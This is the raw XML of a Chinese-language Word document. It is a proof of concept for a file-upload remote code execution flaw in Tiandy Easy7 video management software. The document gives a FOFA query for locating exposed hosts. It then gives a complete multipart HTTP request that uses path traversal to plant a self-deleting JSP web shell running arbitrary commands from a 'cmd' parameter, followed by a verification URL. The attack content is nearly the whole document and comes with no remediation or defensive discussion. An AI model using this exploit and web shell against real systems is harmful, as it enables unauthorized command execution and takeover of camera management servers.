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DB6E2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>天地伟业Easy7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uploadMapServerBgImage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传致RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF6F67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566A7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FOFA：app="Tiandy-Easy7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B0FDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F3467A"/>
    <w:p w14:paraId="7EC55AAB"/>
    <w:p w14:paraId="4F3B8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356C6555">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59986B4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/Easy7/rest/file/uploadMapServerBgImage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4932E10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0D6BDB9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10_15_7)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Chrome/107.0.0.0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57C0F59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77BCDF7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814662"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913A62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*/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD665D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close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015F5B4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10B9B5E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------WebKitFormBoundaryFfJZ4PlAZBixjELj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5366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Content-Disposition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form-data;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name="uploadParams";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7AE5A">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9D0E2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[{"path":"../Easy7/","name":"1.jsp"}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584F6F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------WebKitFormBoundaryFfJZ4PlAZBixjELj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0806841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Content-Disposition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form-data;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name="file";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filename="1.jsp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8A56E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image/jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C45CDA2">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030AB1D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&lt;% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("&lt;pre&gt;");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("&lt;/pre&gt;");new java.io.File(application.getRealPath(request.getServletPath())).delete();%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D6C0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------WebKitFormBoundaryFfJZ4PlAZBixjELj--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E72E5BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79827B74"/>
    <w:p w14:paraId="652FD960">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2BB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漏洞验证url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A79CDB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E36552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/Easy7/1.jsp?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cmd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id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56FEE1C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17066F99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AFFA5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047F2"/>
    <w:rsid w:val="08506077"/>
    <w:rsid w:val="1E974BE6"/>
    <w:rsid w:val="300E670C"/>
    <w:rsid w:val="31FE5396"/>
    <w:rsid w:val="377A54BF"/>
    <w:rsid w:val="599F6BD5"/>
    <w:rsid w:val="730A5F92"/>
    <w:rsid w:val="77E12415"/>
    <w:rsid w:val="7BF7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1039</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1085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2025-06-26T10:04:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:15:16Z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049FA576ECAB436B8F1C314ACBCADB3A_12</vt:lpwstr>
  </property>
</Properties>
</file>